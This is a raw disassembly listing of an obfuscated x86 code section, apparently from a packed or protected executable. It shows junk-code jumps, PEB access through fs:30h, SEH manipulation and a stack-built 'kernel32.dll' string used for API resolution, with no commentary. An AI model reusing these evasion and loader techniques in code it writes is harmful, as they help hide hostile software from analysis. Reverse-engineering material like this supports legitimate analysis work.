; CODE XREF: znnrn47v:loc_489E12j
; DATA XREF: sub_48ADE9+7o
dd 8B501DE4h, 240487C6h, 9F6B68B9h, 4AE90048h
db 38h, 2 dup(0)
; ---------------------------------------------------------------------------
loc_488303: ; CODE XREF: znnrn47v:loc_489B24j
; znnrn47v:0048C4C6j
mov eax, large fs:30h
push edi
push offset loc_488ECF
jmp loc_48C83D
; ---------------------------------------------------------------------------
db 2 dup(0), 81h
; ---------------------------------------------------------------------------
mov byte ptr [esi-62A64A95h], 87h
xor al, 24h
jmp sub_48A71A
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
locret_488327: ; CODE XREF: znnrn47v:loc_48C83Dj
retn
; ---------------------------------------------------------------------------
dd 0EE85F023h
db 0E9h
; ---------------------------------------------------------------------------
loc_48832D: ; CODE XREF: znnrn47v:00488394j
cmc
xor [eax], eax
; ---------------------------------------------------------------------------
dd 0C1C10000h, 0CEF18106h, 360E7DCh, 243AE8CDh, 0
; CODE XREF: znnrn47v:loc_48B03Cj
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48D039
loc_488344: ; CODE XREF: sub_48D039:loc_48C9FBj
jl loc_4882A2
add cl, ch
xchg eax, edi
or eax, [eax]
add cl, dl
jecxz short near ptr loc_488353+3
loc_488353: ; CODE XREF: sub_48D039-4CE8j
ror dword ptr [ebx-0B81626h], cl
; END OF FUNCTION CHUNK FOR sub_48D039
; ---------------------------------------------------------------------------
db 2 dup(0FFh), 0Fh
db 8Bh ; ‹
db 0C8h ; È
db 19h
db 0
db 0
db 0Fh
db 8Fh ;
db 0FBh ; û
db 10h
db 0
db 0
db 58h ; X
db 87h ; ‡
db 16h
db 3Bh ; ;
db 0D0h ; Ð
db 0E9h ; é
db 0B8h ; ¸
db 2Bh ; +
db 0
db 0
db 0
db 0BEh ; ¾
db 49h ; I
db 7Ch, 63h, 0F6h
; ---------------------------------------------------------------------------
loc_488377: ; CODE XREF: znnrn47v:0048A9DAp
xchg ecx, [esp]
pop ecx
add edi, ebp
add edi, 0C055C016h
loopne loc_48838C
; START OF FUNCTION CHUNK FOR sub_48B1BE
loc_488385: ; CODE XREF: sub_48B1BE:loc_48A8E2j
jmp loc_48B4F6
; END OF FUNCTION CHUNK FOR sub_48B1BE
; ---------------------------------------------------------------------------
dw 8100h
; ---------------------------------------------------------------------------
loc_48838C: ; CODE XREF: znnrn47v:00488383j
out dx, eax
fcom dword ptr [esi-87EEBB3h]
pop ecx
jnp short loc_48832D
or eax, [ecx-1A412519h]
call far ptr 90A4h:1EF8F781h
mov bh, al
call sub_4897A2
; ---------------------------------------------------------------------------
dw 0
; ---------------------------------------------------------------------------
loc_4883AC: ; CODE XREF: znnrn47v:0048AF08j
jmp locret_489244
; ---------------------------------------------------------------------------
loc_4883B1: ; CODE XREF: znnrn47v:00488F48j
xchg ecx, [esp]
pop ecx
push 31F3FE91h
xchg esi, [esp]
jmp loc_48A44B
; =============== S U B R O U T I N E =======================================
sub_4883C2 proc near ; CODE XREF: znnrn47v:0048AEDCp
var_4 = dword ptr -4
xchg ebx, [esp+0]
pop ebx
mov eax, large fs:30h
push ecx
push 0D8A9F334h
xchg esi, [esp+4+var_4]
mov ecx, esi
pop esi
jmp near ptr byte_487E91+2
sub_4883C2 endp
; ---------------------------------------------------------------------------
db 0
db 81h ;
db 0E3h ; ã
db 45h ; E
db 7Bh ; {
db 9Eh ; ž
db 0Eh
db 0E9h ; é
db 8Dh ;
db 17h
db 0
db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_609. PRESS KEYPAD "+" TO EXPAND]
db 0
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C3C5
loc_4883ED: ; CODE XREF: sub_48C3C5+9j
jmp nullsub_606
; END OF FUNCTION CHUNK FOR sub_48C3C5
; ---------------------------------------------------------------------------
db 81h ;
db 0F8h ; ø
db 0E8h ; è
db 0E8h ; è
db 9Dh ;
db 79h ; y
db 0E9h ; é
db 16h
db 0Dh
db 0
db 0
db 0
db 0
db 0F7h ; ÷
db 0D0h ; Ð
db 0E9h ; é
db 59h ; Y
db 8
db 0
db 0
db 0C3h ; Ã
db 0
db 0
db 81h ; ; CODE XREF: znnrn47v:loc_48D0E9j
db 0E7h ; ç
db 0B8h ; ¸
db 9
db 17h
db 0B5h ; µ
db 81h ;
db 0CFh ; Ï
db 8Bh ; ‹
db 0F5h ; õ
db 0DBh ; Û
db 32h ; 2
db 81h ;
db 0C7h ; Ç
db 1Eh
db 0CEh ; Î
db 6Ch ; l
db 49h ; I
db 9Dh ;
db 0E9h ; é
db 7Fh ;
db 3Fh ; ?
db 0
db 0
db 0
db 81h ;
db 0F1h ; ñ
db 0B9h ; ¹
db 5Bh ; [
db 0E5h ; å
db 6Eh ; n
db 81h ;
db 0C9h ; É
db 2
db 0FCh ; ü
db 53h ; S
db 0E4h ; ä
db 0C1h ; Á
db 0C1h ; Á
db 4
db 81h ;
db 0C1h ; Á
db 4
db 0E4h ; ä
db 88h ; ˆ
db 18h
db 0E9h ; é
db 9Fh ; Ÿ
db 3Fh ; ?
db 0
db 0
db 0Fh
db 8Fh ;
db 0DEh ; Þ
db 38h ; 8
db 0
db 0
db 0Fh
db 88h ; ˆ
db 17h
db 4Dh ; M
db 0
db 0
db 0E9h ; é
db 9Dh ;
db 27h ; '
db 0
db 0
db 0
db 0
db 0C3h ; Ã
db 0FFh
db 75h ; u
db 0FCh ; ü
db 0FFh
db 15h
db 0C0h ; À
db 0B0h ; °
db 45h ; E
db 0
db 57h ; W
db 8Bh ; ‹
db 0FAh ; ú
db 87h ; ‡
db 3Ch ; <
db 24h ; $
db 68h ; h
db 22h ; "
db 8Ah ; Š
db 88h ; ˆ
db 0F0h ; ð
db 0E9h ; é
db 75h ; u
db 28h ; (
db 0
db 0
db 0
db 0
unk_48846B db 68h ; h ; DATA XREF: sub_48A5BC+DEo
db 11h
db 0C8h ; È
db 50h ; P
db 50h ; P
db 5Fh ; _
; ---------------------------------------------------------------------------
loc_488471: ; CODE XREF: znnrn47v:0048A09Aj
rol edi, 17h
push ebx
push 0BD4E0219h
jmp loc_488724
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C14F
loc_48847F: ; CODE XREF: sub_48C14F-257Aj
sub ecx, 0A77AE006h
xor ecx, 0E8C3201Ah
test eax, ecx
pop ecx
jmp loc_48A8DA
; END OF FUNCTION CHUNK FOR sub_48C14F
; ---------------------------------------------------------------------------
db 0
db 8Bh ; ‹
db 0ECh ; ì
db 83h ; ƒ
db 0C4h ; Ä
db 0C8h ; È
db 0C7h ; Ç
db 45h ; E
db 0E8h ; è
db 6Bh ; k
db 65h ; e
db 72h ; r
db 6Eh ; n
db 0C7h ; Ç
db 45h ; E
db 0ECh ; ì
db 65h ; e
db 6Ch ; l
db 33h ; 3
db 32h ; 2
db 0C7h ; Ç
db 45h ; E
db 0F0h ; ð
db 2Eh ; .
db 64h ; d
db 6Ch ; l
db 6Ch ; l
db 33h ; 3
db 0C0h ; À
db 56h ; V
db 0E9h ; é
db 6Dh ; m
db 47h ; G
db 0
db 0
db 0C1h ; Á
db 0C2h ; Â
db 18h
db 0E8h ; è
db 21h ; !
db 1Dh
db 0
db 0
db 0
db 68h ; h
db 70h ; p
db 2Dh ; -
db 1Dh
db 0EEh ; î
db 0E9h ; é
db 91h ; ‘
db 17h
db 0
db 0
db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_610. PRESS KEYPAD "+" TO EXPAND]
db 0
db 0
unk_4884CD db 81h ; ; DATA XREF: sub_48A28E+Bo
db 0C7h ; Ç
db 42h ; B
db 36h ; 6
db 45h ; E
db 0FDh ; ý
db 8Bh ; ‹
db 3Fh ; ?
db 87h ; ‡
db 3Ch ; <
db 24h ; $
db 0FFh
db 15h
db 0C0h ; À
db 0B0h ; °
db 45h ; E
db 0
db 0E9h ; é
db 58h ; X
db 0FEh ; þ
db 0FFh
db 0FFh
db 0
db 0
db 0E9h ; é
db 0B9h ; ¹
db 17h
db 0
db 0
db 5Ah ; Z
db 0C6h ; Æ
db 3
db 87h ; ‡
db 5Bh ; [
db 59h ; Y
db 0D1h ; Ñ
db 0C1h ; Á
db 81h ;
db 0F1h ; ñ
db 80h ; €
db 6Fh ; o
db 9Fh ; Ÿ
db 8Bh ; ‹
db 0E9h ; é
db 14h
db 2Eh ; .
db 0
db 0
db 0
db 0Fh
db 8Ch ; Œ
db 4Fh ; O
db 15h
db 0
db 0
db 52h ; R
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C14F
loc_488505: ; CODE XREF: sub_48C14F:loc_48BF51j
xor edi, 0A12E1DEh
call sub_48A28E
loc_488510: ; CODE XREF: sub_48C14F+15Aj
jmp nullsub_609
; END OF FUNCTION CHUNK FOR sub_48C14F
; ---------------------------------------------------------------------------
db 0
db 0
; ---------------------------------------------------------------------------
loc_488517: ; CODE XREF: znnrn47v:0048A057j
jmp loc_488970
; =============== S U B R O U T I N E =======================================
sub_48851C proc near ; DATA XREF: znnrn47v:loc_48ACCCo
var_4 = dword ptr -4
push ebx
mov ebx, ecx
xchg ebx, [esp+4+var_4]
cdq
add eax, 487BB1h
jmp loc_48A92A
sub_48851C endp
; ---------------------------------------------------------------------------
db 0Fh
db 83h ; ƒ
db 0A0h ;
db 2Bh ; +
db 0
db 0
db 0E9h ; é
db 1Eh
db 0F7h ; ÷
db 0FFh
db 0FFh
db 0
; ---------------------------------------------------------------------------
loc_488539: ; CODE XREF: znnrn47v:0048CC75j
push 48ACE5h
jmp near ptr dword_489554+3
; ---------------------------------------------------------------------------
db 0Fh
db 86h ; †
db 8Eh ; Ž
db 1
db 0
db 0
; =============== S U B R O U T I N E =======================================
sub_488549 proc near ; CODE XREF: znnrn47v:0048B2DCp
; FUNCTION CHUNK AT 00488987 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004894F5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048AA69 SIZE 00000027 BYTES
; FUNCTION CHUNK AT 0048AE3A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048BE2E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048C357 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0048CEA0 SIZE 0000000B BYTES
xchg esi, [esp+0]
pop esi
push 74287896h
pop edi
jmp loc_48AE3A
sub_488549 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48A5BC
loc_48855A: ; CODE XREF: sub_48A5BC:loc_48A776j
call ds:dword_45B0C0 ; ExitProcess
push esi
mov esi, eax
xchg esi, [esp+4+var_4]
push offset dword_48C668
jmp nullsub_573
; END OF FUNCTION CHUNK FOR sub_48A5BC
; ---------------------------------------------------------------------------
dd 408B0000h, 0FC16680Ch, 0C15AB27Eh, 0C2F719C2h, 100000h
dd 11F8E9h
db 0
; ---------------------------------------------------------------------------
loc_488589: ; DATA XREF: znnrn47v:0048827Co
push edx
mov edx, edi
xchg edx, [esp]
push 72D2D4FBh
pop edi
jmp loc_48AB31
; ---------------------------------------------------------------------------
dw 0C100h
; ---------------------------------------------------------------------------
lds edx, [edi+eax*4]
adc al, 24h
xchg ecx, [esp]
mov edx, ecx
pop ecx
push 0E1D5C0AAh
xchg edx, [esp]
mov esi, edx
jmp loc_488716
; ---------------------------------------------------------------------------
cmp edx, 9599365Ch
jmp loc_488EBA
; ---------------------------------------------------------------------------
db 2 dup(0), 81h ; CODE XREF: znnrn47v:00488635j
; znnrn47v:loc_48B981j
dd 68C1D1E0h, 3C08188h, 0E8F840BDh, 38F2h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48942C
loc_4885D5: ; CODE XREF: sub_48942C+Fj
jmp nullsub_479
; END OF FUNCTION CHUNK FOR sub_48942C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C14F
loc_4885DA: ; CODE XREF: sub_48C14F+13Ej
rol eax, 1Bh
add eax, 2A2C5DA3h
push edx
pushf
push 27342FD4h
pop edx
jmp loc_48AC6C
; END OF FUNCTION CHUNK FOR sub_48C14F
; ---------------------------------------------------------------------------
dd 93E85B00h, 0E900003Dh, 3A7Eh ; CODE XREF: znnrn47v:loc_48BA8Fj
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48930E
loc_4885FD: ; CODE XREF: sub_48930E:loc_48BAECj
mov byte ptr [esi], 85h
pop esi
add ecx, 8EB430F0h
sub ecx, 575AB9Fh
xor ecx, 8BFB584Bh
or ecx, 0B947AF84h
jmp loc_488D47
; END OF FUNCTION CHUNK FOR sub_48930E
; ---------------------------------------------------------------------------
align 10h
retn
; ---------------------------------------------------------------------------
align 2
loc_488622: ; CODE XREF: znnrn47v:loc_48CB64j
jg nullsub_589
push 0F39FE1B8h
jbe loc_48AD47
sub ebx, ecx
jmp near ptr byte_4885C1+2
; ---------------------------------------------------------------------------
db 0
db 58h ; X
; ---------------------------------------------------------------------------
mov [edx], eax
pop edx
loc_48863F: ; DATA XREF: sub_48A541-F62o
pushf
push 2B821C56h
pop eax
sub eax, 89E0A769h
add eax, 8A1C086Fh
jmp loc_489796
; ---------------------------------------------------------------------------
align 4
pop ecx
jmp sub_48A086
; ---------------------------------------------------------------------------
dw 840Fh
dd 0FFFFFE10h, 951E9h
db 0
; =============== S U B R O U T I N E =======================================
sub_488669 proc near ; DATA XREF: sub_489582+A3Co
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004899B9 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0048BA39 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048C2E9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D06D SIZE 00000005 BYTES
push ebx
mov ebx, offset byte_48ACFB
jmp loc_48C2E9
sub_488669 endp
; ---------------------------------------------------------------------------
dword_488674 dd 4897EF68h, 0F4FCE900h, 0E2C1FFFFh, 42B8E913h, 0F000000h
; DATA XREF: znnrn47v:00488FB0o
dd 35FD82h, 0F5840F00h, 8100001Eh, 0FB774E1h, 23C98124h
dd 813B295Ch, 0E29FDBE9h, 0CBD268DEh, 26E90048h, 1Eh, 95A46800h
dd 0FAE90048h, 8700001Ch, 1372E9DEh, 81000000h, 0E23B42D2h
dd 2414879Dh, 54E9505Ah, 9D00003Bh, 0C3241C43h, 30F3E800h
dd 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48A96C
loc_4886E0: ; CODE XREF: sub_48A96C+9j
jmp near ptr dword_487CA0+7
; END OF FUNCTION CHUNK FOR sub_48A96C
; ---------------------------------------------------------------------------
db 0
db 0
db 0Fh
db 84h ; „
db 81h ;
db 9
db 0
db 0
db 0E9h ; é
db 0AAh ; ª
db 8
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48B9DB
loc_4886F2: ; CODE XREF: sub_48B9DB+1Dj
mov byte ptr [edi], 0FFh
pop edi
xchg edx, [esp-4+arg_0]
cmp ds:dword_45B0C0, edx
push ecx
mov ecx, edi
xchg ecx, [esp+0]
jmp loc_48AE34
; END OF FUNCTION CHUNK FOR sub_48B9DB
; ---------------------------------------------------------------------------
dw 6800h
dd offset loc_48A57E
; ---------------------------------------------------------------------------
jmp loc_488BF9
; ---------------------------------------------------------------------------
align 2
loc_488716: ; CODE XREF: znnrn47v:004885B1j
pop edx
xor esi, 4FC6E7C4h
call near ptr dword_4880FC+27h
; ---------------------------------------------------------------------------
dw 0
; ---------------------------------------------------------------------------
loc_488724: ; CODE XREF: znnrn47v:0048847Aj
jmp loc_48A6E8
; ---------------------------------------------------------------------------
db 2 dup(0), 0E8h
dd 0FFFFF34Fh, 3D9C8B0Fh, 0F22B0000h, 0FFFC74E8h, 0E90000FFh
; CODE XREF: znnrn47v:0048AA5Dj
; znnrn47v:loc_48922Bj
dd 30C8h, 0AE90000h, 0FFFFF9h, 86B850C3h, 0E90048A7h, 0FFFFFB7Dh
dd 12880F00h, 23000042h, 43E381EBh, 81380F64h, 396375C3h
dd 241C07E8h, 2564E9h, 2C000000h, 4899F205h, 0C300C600h
dd 2C11E952h, 0
; ---------------------------------------------------------------------------
loc_488788: ; CODE XREF: znnrn47v:0048ACC5j
pop edi
or edi, 0F7F1EBCAh
push ebx
mov ebx, edi
xchg ebx, [esp]
jmp loc_48B7B5
; ---------------------------------------------------------------------------
loc_48879A: ; CODE XREF: znnrn47v:loc_48CDC1j
push offset byte_48938D
jmp loc_48B26B
; ---------------------------------------------------------------------------
loc_4887A4: ; CODE XREF: znnrn47v:loc_48B115j
sub eax, edx
loc_4887A6: ; DATA XREF: znnrn47v:0048A515o
dec edx
test [edx+18h], al
; ---------------------------------------------------------------------------
dw 0
db 0E9h ; é
db 9Eh ; ž
db 17h
db 0
db 0
; ---------------------------------------------------------------------------
loc_4887B1: ; CODE XREF: znnrn47v:00489EC3j
; znnrn47v:loc_48C926j
call sub_4889EB
; ---------------------------------------------------------------------------
db 0
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48A541
loc_4887B8: ; CODE XREF: sub_48A541+19D5j
jmp loc_48A31A
; END OF FUNCTION CHUNK FOR sub_48A541
; ---------------------------------------------------------------------------
align 2
jns loc_48A3E1
xchg edi, [esp]
pop edi
push eax
call sub_488FBC
; START OF FUNCTION CHUNK FOR sub_48C14F
loc_4887CE: ; CODE XREF: sub_48C14F+90Aj
jmp loc_48B328
; END OF FUNCTION CHUNK FOR sub_48C14F
; ---------------------------------------------------------------------------
align 4
jmp loc_48C4E9
; ---------------------------------------------------------------------------
db 2 dup(0), 0E9h
dd 0D69h, 9018BE00h, 65E90048h, 0Dh, 59240C87h, 8BBA058Dh
dd 8B560048h, 923768F0h, 0C6E90048h, 8B00000Ch, 0C1819CC1h
dd 0F469A2D7h, 0E9240C87h, 29AAh, 0CA810000h, 5AFA166Ah
dd 67FE9h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_488822: ; DATA XREF: znnrn47v:00488264o
push 7C0FC90Ch
xchg ecx, [esp]
mov eax, ecx
pop ecx
rol eax, 1Bh
add eax, 0F69B66CEh
jmp loc_48CA60
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_489135
loc_48883B: ; CODE XREF: sub_489135:loc_4894EFj
pop edi
or edx, edx
jmp loc_489DA9
; END OF FUNCTION CHUNK FOR sub_489135
; ---------------------------------------------------------------------------
db 0E8h
dd 0FFFFF5CEh
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48B677
loc_48884A: ; CODE XREF: sub_48B677+Aj
jmp loc_4880B6
; END OF FUNCTION CHUNK FOR sub_48B677
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4893DD
loc_48884F: ; CODE XREF: sub_4893DD+Cj
jmp sub_48A71A
; END OF FUNCTION CHUNK FOR sub_4893DD
; ---------------------------------------------------------------------------
dd 1C60000h, 8A59680Fh, 8CE90048h, 1Bh, 6C6C300h, 8B575E87h
; CODE XREF: znnrn47v:0048B383j
dd 4829E9FDh
db 3 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_489CDA
loc_488873: ; CODE XREF: sub_489CDA+Cj
xchg edi, [esp+0]
mov esi, offset byte_48AEB1
jmp loc_489712
; END OF FUNCTION CHUNK FOR sub_489CDA
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
locret_488881: ; CODE XREF: znnrn47v:0048A04Ej
retn
; ---------------------------------------------------------------------------
dw 0E900h
dd 24F3h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48A71A
loc_488889: ; CODE XREF: sub_48A71A-1E11j
jmp loc_48CE1F
; END OF FUNCTION CHUNK FOR sub_48A71A
; ---------------------------------------------------------------------------
dw 0E900h
dd 1EB6h, 0B5690B68h, 0BF5758E9h, 489664h, 0BEDE9h, 8100C300h
dd 9E5075F3h, 81DD0386h, 9A43EDC3h, 871B8BCAh, 15FF241Ch
dd 45B0C0h, 4716E951h, 0C1810000h, 6745F54h, 7ABCE181h
dd 0F18131E9h, 0D266FCFAh, 2656C181h, 0E6E87DDBh, 0
; ---------------------------------------------------------------------------
pop ebx
or ebx, 69D221E9h
test ebx, 100h
jmp loc_48D0B4
; ---------------------------------------------------------------------------
align 4
jg loc_489518
cdq
jmp sub_487FA1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48A71A
loc_488904: ; CODE XREF: sub_48A71A:loc_48C0A7j
mov ecx, offset byte_4891AD
jmp loc_488889
; END OF FUNCTION CHUNK FOR sub_48A71A
; ---------------------------------------------------------------------------
align 10h
sub ecx, 0A6EE96A3h
jmp sub_48C59A
; ---------------------------------------------------------------------------
align 4
push eax
push ebp
pop eax
xchg eax, [esp]
push 488494h
jmp loc_489945
; ---------------------------------------------------------------------------
dd 73ED6800h, 17E9FDCBh, 13h, 0DD98100h, 0E9354EB2h, 34F4h
dd 34870000h, 240C8724h, 0E959F18Bh, 0FFFFFF40h
db 0
; =============== S U B R O U T I N E =======================================
sub_488955 proc near ; CODE XREF: sub_48C82C:loc_48AF85p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004880C1 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00488ABC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004890C8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004891F9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004893FF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048A3FF SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0048A4FF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048AD3F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048AEBE SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0048AEE1 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0048AF36 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0048AF71 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0048AFA1 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0048C2FF SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0048C63F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048C6FF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CECA SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0048D0C5 SIZE 00000007 BYTES
xchg esi, [esp+0]
pop esi
push 986F15FDh
pop edi
or edi, 1C4BD40Dh
test edi, 40h
jmp loc_4890C8
sub_488955 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_488970: ; CODE XREF: znnrn47v:loc_488517j
jnz loc_489721
add [eax+1Eh], ch
sbb [ecx+edi*2], edx
jmp loc_489717
; ---------------------------------------------------------------------------
jl sub_48C93E
; START OF FUNCTION CHUNK FOR sub_488549
loc_488987: ; CODE XREF: sub_488549:loc_48CEA0j
xor edi, 0BAE49585h
add edi, ecx
push ebx
push 0F567D8B6h
jmp loc_4894F5
; END OF FUNCTION CHUNK FOR sub_488549
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_489135
loc_48899C: ; CODE XREF: sub_489135+3888j
xor edx, 0CC3969FEh
add edx, ebp
push eax
push 0D68A6122h
pop eax
and eax, 606747AEh
xor eax, 3AF44157h
jmp loc_48C293
; END OF FUNCTION CHUNK FOR sub_489135
; ---------------------------------------------------------------------------
dd 3CC18100h, 0E9E72B99h, 133Bh, 24048700h, 0A0F18158h
dd 0E840AB12h, 17B4h
; ---------------------------------------------------------------------------
loc_4889D8: ; CODE XREF: znnrn47v:00489BB1j
jmp loc_489F90
; ---------------------------------------------------------------------------
align 2
add eax, ecx
jmp loc_489006
; ---------------------------------------------------------------------------
jbe loc_48AE8F
; =============== S U B R O U T I N E =======================================
sub_4889EB proc near ; CODE XREF: znnrn47v:loc_4887B1p
xchg edx, [esp+0]
pop edx
lodsb
add edx, eax
rol edx, 3
push offset loc_48AD0D
jmp nullsub_607
sub_4889EB endp
; ---------------------------------------------------------------------------
align 10h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_568. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_488A03: ; DATA XREF: sub_48B6E8:loc_48B7DDo
push ecx
mov ecx, esi
xchg ecx, [esp]
mov esi, offset loc_48C84D
jmp loc_48CC95
; ---------------------------------------------------------------------------
db 33h
dd 0FF2CE9FEh, 1487FFFFh, 0C1685A24h, 0E90048A2h, 0FFFFFBF8h
dd 0C300h, 0D3CC081h, 0C0815965h, 0A69AF32Ch, 3D86E8h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C93E
loc_488A3D: ; CODE XREF: sub_48C93E-F32j
jmp loc_48BF26
; END OF FUNCTION CHUNK FOR sub_48C93E
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_489CDA
loc_488A43: ; CODE XREF: sub_489CDA-5AFj
jmp sub_48A71A
; END OF FUNCTION CHUNK FOR sub_489CDA
; ---------------------------------------------------------------------------
dd 3C60000h, 0C7E85BFFh, 0E9FFFFFFh, 386Ch, 8D595900h
dd 87E8E845h, 81000021h, 2C5D34F1h, 97890F85h, 0FFFFFDh
dd 22F68100h, 81D9C042h, 9E8B2CEh, 0FD81E94Eh, 0C8C1FFFFh
dd 92DE91Eh, 0
; ---------------------------------------------------------------------------
cmp esi, ebp
jmp loc_489E12
; ---------------------------------------------------------------------------
align 4
locret_488A94: ; CODE XREF: znnrn47v:00488FB4j
retn
; ---------------------------------------------------------------------------
jmp locret_48A8D8
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48BACA
loc_488A9B: ; CODE XREF: sub_48BACA+A88j
or edi, 73C38B64h
add edi, 84783A12h
add edi, ebp
add edi, 7FBBEA54h
push offset loc_488E20
jmp loc_48B155
; END OF FUNCTION CHUNK FOR sub_48BACA
; ---------------------------------------------------------------------------
align 2
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_488955
loc_488ABC: ; CODE XREF: znnrn47v:loc_48984Fj
; znnrn47v:0048A0A0j ...
pop large dword ptr fs:0
add esp, 4
retn
; END OF FUNCTION CHUNK FOR sub_488955
; ---------------------------------------------------------------------------
align 4
dd 9B516800h, 0FCE90048h, 81FFFFF1h, 3918DED3h, 33E8E9A6h
dd 68000000h, 85D0C35Dh, 0C9E9h, 0C300h, 5AC302C6h, 489AF668h
dd 1E6CE900h, 68510000h, 7B41039Ch, 52C98159h, 81A2025Ch
dd 21C5E4E9h, 0C3C181DDh, 87E226F8h, 60E9240Ch, 3Ah, 24348700h
dd 8B240C87h, 8B59F1h, 3BD7E9h, 0C870000h, 59F98B24h, 5664C668h
dd 2ACDE9C6h, 1C60000h, 0F0815903h, 0CBA3A2B1h, 1077E8h
dd 0E9000000h, 3823h, 0EFE90000h, 0E9FFFFFEh, 1775h, 68570000h
dd 66FB1B0Fh, 16C7C15Fh, 0E1AE9h
db 3 dup(0)
; ---------------------------------------------------------------------------
locret_488B73: ; CODE XREF: znnrn47v:00489FD3j
retn
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C14F
loc_488B76: ; CODE XREF: sub_48C14F-180Bj
jmp loc_48C652
; END OF FUNCTION CHUNK FOR sub_48C14F
; ---------------------------------------------------------------------------
align 4
push ebx
push ebx
mov ebx, offset loc_48950C
jmp loc_48A6E3
; ---------------------------------------------------------------------------
db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_592. PRESS KEYPAD "+" TO EXPAND]
align 4
db 0
; =============== S U B R O U T I N E =======================================
sub_488B8D proc near ; DATA XREF: sub_4880A0+Ao
; FUNCTION CHUNK AT 0048C31E SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0048D0BB SIZE 0000000A BYTES
push ebx
push 5017D9DAh
pop ebx
jmp loc_48C31E
sub_488B8D endp
; ---------------------------------------------------------------------------
align 2
dw 3487h
dd 9C5F5E24h, 1833E8h
db 3 dup(0)
; ---------------------------------------------------------------------------
locret_488BA7: ; CODE XREF: znnrn47v:00487FDDj
retn
; ---------------------------------------------------------------------------
dd 0FE850000h, 24D6E9h, 4870000h, 5D565824h ; CODE XREF: sub_48C70B+Dp
; ---------------------------------------------------------------------------
pop esi
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_603. PRESS KEYPAD "+" TO EXPAND]
byte_488BBA db 0Fh ; DATA XREF: sub_48B63C+4w
db 81h
dd 2833h, 0FFEEEAE8h, 4517E9FFh, 0 ; CODE XREF: znnrn47v:0048B323j
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48920C
loc_488BCC: ; CODE XREF: sub_48920C:loc_48CA1Ej
push eax
mov eax, offset loc_48A5E4
jmp loc_48AFB1
; END OF FUNCTION CHUNK FOR sub_48920C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C14F
loc_488BD7: ; CODE XREF: sub_48C14F+16Ej
or edi, 428FBFB0h
add edi, 0C99E545h
cmp edi, 0FA74CCCFh
jmp loc_48C895
; END OF FUNCTION CHUNK FOR sub_48C14F
; ---------------------------------------------------------------------------
align 10h
cdq
jmp loc_48C79B
; ---------------------------------------------------------------------------
db 0
